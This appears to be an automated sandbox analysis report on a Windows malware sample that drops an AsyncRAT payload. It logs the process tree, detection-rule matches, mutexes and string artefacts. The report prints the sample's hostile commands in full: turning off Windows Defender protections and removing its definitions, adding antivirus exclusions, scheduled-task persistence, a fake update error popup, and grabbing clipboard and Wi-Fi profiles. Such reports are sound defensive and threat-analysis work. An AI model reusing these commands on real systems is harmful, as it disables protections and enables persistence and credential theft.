                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeCode function: String function: 00007FFDFF191325 appears 109 times
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeCode function: String function: 00007FFDFAED9330 appears 135 times
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeCode function: String function: 00007FFDFAF01E20 appears 33 times
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeCode function: String function: 00007FFDFF20C181 appears 219 times
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeCode function: String function: 00007FF644872910 appears 34 times
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeCode function: String function: 00007FFDFF20C16F appears 66 times
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeCode function: String function: 00007FFDFAEDA490 appears 162 times
                      Source: C:\Users\user\AppData\Local\Temp\_MEI58162\rar.exeCode function: String function: 00007FF71F0A8444 appears 48 times
                      Source: C:\Users\user\AppData\Local\Temp\_MEI58162\rar.exeCode function: String function: 00007FF71F0D49F4 appears 53 times
                      Source: sB2ClgrGng.exeStatic PE information: invalid certificate
                      Source: rar.exe.0.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
                      Source: unicodedata.pyd.0.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
                      Source: sB2ClgrGng.exeBinary or memory string: OriginalFilename vs sB2ClgrGng.exe
                      Source: sB2ClgrGng.exe, 00000000.00000003.1756191157.000001D37210F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamevcruntime140.dllT vs sB2ClgrGng.exe
                      Source: sB2ClgrGng.exe, 00000000.00000003.1761398550.000001D37210F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamesqlite3.dll0 vs sB2ClgrGng.exe
                      Source: sB2ClgrGng.exe, 00000000.00000003.1761713787.000001D37210F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameunicodedata.pyd. vs sB2ClgrGng.exe
                      Source: sB2ClgrGng.exe, 00000000.00000000.1755836126.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameBthUdTask.exej% vs sB2ClgrGng.exe
                      Source: sB2ClgrGng.exe, 00000000.00000003.1756739377.000001D37210F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_bz2.pyd. vs sB2ClgrGng.exe
                      Source: sB2ClgrGng.exe, 00000000.00000003.1757512857.000001D37210F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_socket.pyd. vs sB2ClgrGng.exe
                      Source: sB2ClgrGng.exe, 00000000.00000003.1759357269.000001D37210F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamelibsslH vs sB2ClgrGng.exe
                      Source: sB2ClgrGng.exe, 00000000.00000003.1757759866.000001D37210F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_ssl.pyd. vs sB2ClgrGng.exe
                      Source: sB2ClgrGng.exe, 00000000.00000003.1757410197.000001D37210F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_queue.pyd. vs sB2ClgrGng.exe
                      Source: sB2ClgrGng.exe, 00000000.00000003.1757281779.000001D37210F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_lzma.pyd. vs sB2ClgrGng.exe
                      Source: sB2ClgrGng.exe, 00000000.00000003.1761196357.000001D37210F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameselect.pyd. vs sB2ClgrGng.exe
                      Source: sB2ClgrGng.exe, 00000000.00000003.1756883286.000001D37210F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_ctypes.pyd. vs sB2ClgrGng.exe
                      Source: sB2ClgrGng.exe, 00000000.00000003.1757187950.000001D37210F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_hashlib.pyd. vs sB2ClgrGng.exe
                      Source: sB2ClgrGng.exe, 00000000.00000003.1757004172.000001D37210F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_decimal.pyd. vs sB2ClgrGng.exe
                      Source: sB2ClgrGng.exe, 00000000.00000003.1757639534.000001D37210F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_sqlite3.pyd. vs sB2ClgrGng.exe
                      Source: sB2ClgrGng.exeBinary or memory string: OriginalFilename vs sB2ClgrGng.exe
                      Source: sB2ClgrGng.exe, 00000001.00000002.2201150684.00007FFE13398000.00000004.00000001.01000000.0000000C.sdmpBinary or memory string: OriginalFilename_socket.pyd. vs sB2ClgrGng.exe
                      Source: sB2ClgrGng.exe, 00000001.00000002.2200775654.00007FFE13213000.00000004.00000001.01000000.00000011.sdmpBinary or memory string: OriginalFilename_hashlib.pyd. vs sB2ClgrGng.exe
                      Source: sB2ClgrGng.exe, 00000001.00000002.2200251845.00007FFE11EE4000.00000004.00000001.01000000.00000006.sdmpBinary or memory string: OriginalFilename_ctypes.pyd. vs sB2ClgrGng.exe
                      Source: sB2ClgrGng.exe, 00000001.00000002.2201493725.00007FFE14649000.00000004.00000001.01000000.00000009.sdmpBinary or memory string: OriginalFilename_bz2.pyd. vs sB2ClgrGng.exe
                      Source: sB2ClgrGng.exe, 00000001.00000000.1763102374.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameBthUdTask.exej% vs sB2ClgrGng.exe
                      Source: sB2ClgrGng.exe, 00000001.00000002.2199296110.00007FFE0EC02000.00000004.00000001.01000000.0000000E.sdmpBinary or memory string: OriginalFilename_ssl.pyd. vs sB2ClgrGng.exe
                      Source: sB2ClgrGng.exe, 00000001.00000002.2201810199.00007FFE148BC000.00000004.00000001.01000000.0000000D.sdmpBinary or memory string: OriginalFilenameselect.pyd. vs sB2ClgrGng.exe
                      Source: sB2ClgrGng.exe, 00000001.00000002.2200490411.00007FFE130CC000.00000004.00000001.01000000.00000012.sdmpBinary or memory string: OriginalFilename_queue.pyd. vs sB2ClgrGng.exe
                      Source: sB2ClgrGng.exe, 00000001.00000002.2196648212.00007FFDFAEA0000.00000004.00000001.01000000.0000000F.sdmpBinary or memory string: OriginalFilenamelibcryptoH vs sB2ClgrGng.exe
                      Source: sB2ClgrGng.exe, 00000001.00000002.2195399422.00007FFDF8669000.00000004.00000001.01000000.00000016.sdmpBinary or memory string: OriginalFilenameunicodedata.pyd. vs sB2ClgrGng.exe
                      Source: sB2ClgrGng.exe, 00000001.00000002.2199598178.00007FFE0EC33000.00000004.00000001.01000000.0000000A.sdmpBinary or memory string: OriginalFilename_sqlite3.pyd. vs sB2ClgrGng.exe
                      Source: sB2ClgrGng.exe, 00000001.00000002.2199936374.00007FFE0EC6C000.00000004.00000001.01000000.00000008.sdmpBinary or memory string: OriginalFilename_lzma.pyd. vs sB2ClgrGng.exe
                      Source: sB2ClgrGng.exe, 00000001.00000002.2198959360.00007FFDFF258000.00000004.00000001.01000000.00000010.sdmpBinary or memory string: OriginalFilenamelibsslH vs sB2ClgrGng.exe
                      Source: sB2ClgrGng.exe, 00000001.00000002.2202060831.00007FFE148D9000.00000002.00000001.01000000.00000005.sdmpBinary or memory string: OriginalFilenamevcruntime140.dllT vs sB2ClgrGng.exe
                      Source: sB2ClgrGng.exe, 00000001.00000002.2198442898.00007FFDFB707000.00000004.00000001.01000000.00000004.sdmpBinary or memory string: OriginalFilenamepython312.dll. vs sB2ClgrGng.exe
                      Source: sB2ClgrGng.exe, 00000001.00000002.2197118312.00007FFDFB04C000.00000004.00000001.01000000.0000000B.sdmpBinary or memory string: OriginalFilenamesqlite3.dll0 vs sB2ClgrGng.exe
                      Source: sB2ClgrGng.exeBinary or memory string: OriginalFilenameBthUdTask.exej% vs sB2ClgrGng.exe
                      Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeProcess created: Commandline size = 3647
                      Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 3615
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeProcess created: Commandline size = 3647Jump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 3615
                      Source: 15.0.bound.exe.2f0000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                      Source: 0000000F.00000000.1789335378.00000000002F2000.00000002.00000001.01000000.00000013.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                      Source: C:\Users\user\AppData\Roaming\word.exe, type: DROPPEDMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                      Source: libcrypto-3.dll.0.drStatic PE information: Section: UPX1 ZLIB complexity 0.999059198943662
                      Source: libssl-3.dll.0.drStatic PE information: Section: UPX1 ZLIB complexity 0.9916915494109948
                      Source: python312.dll.0.drStatic PE information: Section: UPX1 ZLIB complexity 0.9993773228216073
                      Source: sqlite3.dll.0.drStatic PE information: Section: UPX1 ZLIB complexity 0.997848412298387
                      Source: unicodedata.pyd.0.drStatic PE information: Section: UPX1 ZLIB complexity 0.9935930524553571
                      Source: word.exe.15.dr, t59oPSjC0CT.csCryptographic APIs: 'TransformFinalBlock'
                      Source: word.exe.15.dr, t59oPSjC0CT.csCryptographic APIs: 'TransformFinalBlock'
                      Source: word.exe.15.dr, VpHhD0XCMxd.csCryptographic APIs: 'TransformFinalBlock'
                      Source: word.exe.15.dr, eO6GW79PYldYZmhf60USdfbHoGhiqOgoEJlFPK0g04oze8GBTbSWTryxgq2oxwnScpMQ.csBase64 encoded string: 'ljEVtBJ3z/kiMBccvclQVimpRhxVt9iI6MqIaT/ViJ1qrGodEmEjFGEmw/7Hd2/n'
                      Source: classification engineClassification label: mal100.rans.troj.spyw.expl.evad.winEXE@172/70@2/4
                      Source: C:\Users\user\AppData\Local\Temp\_MEI58162\rar.exeCode function: 84_2_00007FF71F0ACAFC GetLastError,FormatMessageW,84_2_00007FF71F0ACAFC
                      Source: C:\Users\user\AppData\Local\Temp\_MEI58162\rar.exeCode function: 84_2_00007FF71F0AEF50 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,84_2_00007FF71F0AEF50
                      Source: C:\Users\user\AppData\Local\Temp\_MEI58162\rar.exeCode function: 84_2_00007FF71F0DB57C GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitWindowsEx,84_2_00007FF71F0DB57C
                      Source: C:\Users\user\AppData\Local\Temp\_MEI58162\rar.exeCode function: 84_2_00007FF71F0B3144 GetDiskFreeSpaceExW,84_2_00007FF71F0B3144
                      Source: C:\Users\user\AppData\Local\Temp\bound.exeFile created: C:\Users\user\AppData\Roaming\word.exe
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeMutant created: \Sessions\1\BaseNamedObjects\C
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2132:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8800:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7480:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6500:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7732:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5772:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8636:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1196:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8128:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8676:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4564:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7332:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7712:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2996:120:WilError_03
                      Source: C:\Users\user\AppData\Roaming\word.exeMutant created: NULL
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8320:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3736:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7972:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8252:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8484:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2060:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2588:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6356:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8172:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8684:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7888:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7916:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8748:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8832:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2596:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9188:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7900:120:WilError_03
                      Source: C:\Users\user\AppData\Local\Temp\bound.exeMutant created: \Sessions\1\BaseNamedObjects\tqSXJejMVjIDSKyY
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI58162Jump to behavior
                      Source: sB2ClgrGng.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
                      Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
                      Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
                      Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\word.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
                      Source: C:\Users\user\AppData\Local\Temp\bound.exeFile read: C:\Users\user\Desktop\desktop.ini
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: sB2ClgrGng.exe, 00000001.00000002.2196754681.00007FFDFAED1000.00000040.00000001.01000000.0000000B.sdmpBinary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
                      Source: sB2ClgrGng.exe, sB2ClgrGng.exe, 00000001.00000002.2196754681.00007FFDFAED1000.00000040.00000001.01000000.0000000B.sdmpBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
                      Source: sB2ClgrGng.exe, sB2ClgrGng.exe, 00000001.00000002.2196754681.00007FFDFAED1000.00000040.00000001.01000000.0000000B.sdmpBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
                      Source: sB2ClgrGng.exe, sB2ClgrGng.exe, 00000001.00000002.2196754681.00007FFDFAED1000.00000040.00000001.01000000.0000000B.sdmpBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
                      Source: sB2ClgrGng.exe, sB2ClgrGng.exe, 00000001.00000002.2196754681.00007FFDFAED1000.00000040.00000001.01000000.0000000B.sdmpBinary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
                      Source: sB2ClgrGng.exe, sB2ClgrGng.exe, 00000001.00000002.2196754681.00007FFDFAED1000.00000040.00000001.01000000.0000000B.sdmpBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
                      Source: sB2ClgrGng.exe, sB2ClgrGng.exe, 00000001.00000002.2196754681.00007FFDFAED1000.00000040.00000001.01000000.0000000B.sdmpBinary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
                      Source: sB2ClgrGng.exeReversingLabs: Detection: 52%
                      Source: sB2ClgrGng.exeVirustotal: Detection: 67%
                      Source: sB2ClgrGng.exeString found in binary or memory: set-addPolicy
                      Source: sB2ClgrGng.exeString found in binary or memory: id-cmc-addExtensions
                      Source: sB2ClgrGng.exeString found in binary or memory: OINT: if this variable is set to 0, it disables the default debugger. It can be set to the callable of your debugger of choice. These variables have equivalent command-line options (see --help for details): PYTHONDEBUG
                      Source: sB2ClgrGng.exeString found in binary or memory: OINT: if this variable is set to 0, it disables the default debugger. It can be set to the callable of your debugger of choice. These variables have equivalent command-line options (see --help for details): PYTHONDEBUG
                      Source: sB2ClgrGng.exeString found in binary or memory: --help
                      Source: sB2ClgrGng.exeString found in binary or memory: --help
                      Source: sB2ClgrGng.exeString found in binary or memory: can't send non-None value to a just-started generator
                      Source: sB2ClgrGng.exeString found in binary or memory: can't send non-None value to a just-started async generator
                      Source: sB2ClgrGng.exeString found in binary or memory: can't send non-None value to a just-started coroutine
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeFile read: C:\Users\user\Desktop\sB2ClgrGng.exeJump to behavior
                      Source: unknownProcess created: C:\Users\user\Desktop\sB2ClgrGng.exe "C:\Users\user\Desktop\sB2ClgrGng.exe"
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeProcess created: C:\Users\user\Desktop\sB2ClgrGng.exe "C:\Users\user\Desktop\sB2ClgrGng.exe"
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\sB2ClgrGng.exe'"
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\bound.exe'"
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "start bound.exe"
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('System failed to install recent update. click ok to retry.', 0, 'Error', 0+16);close()""
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\sB2ClgrGng.exe'
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\mshta.exe mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('System failed to install recent update. click ok to retry.', 0, 'Error', 0+16);close()"
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\bound.exe bound.exe
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\bound.exe'
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'"
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-Clipboard
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                      Source: C:\Users\user\AppData\Local\Temp\bound.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "word" /tr "C:\Users\user\AppData\Roaming\word.exe"
                      Source: C:\Windows\System32\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "systeminfo"
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profile
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\systeminfo.exe systeminfo
                      Source: unknownProcess created: C:\Users\user\AppData\Roaming\word.exe C:\Users\user\AppData\Roaming\word.exe
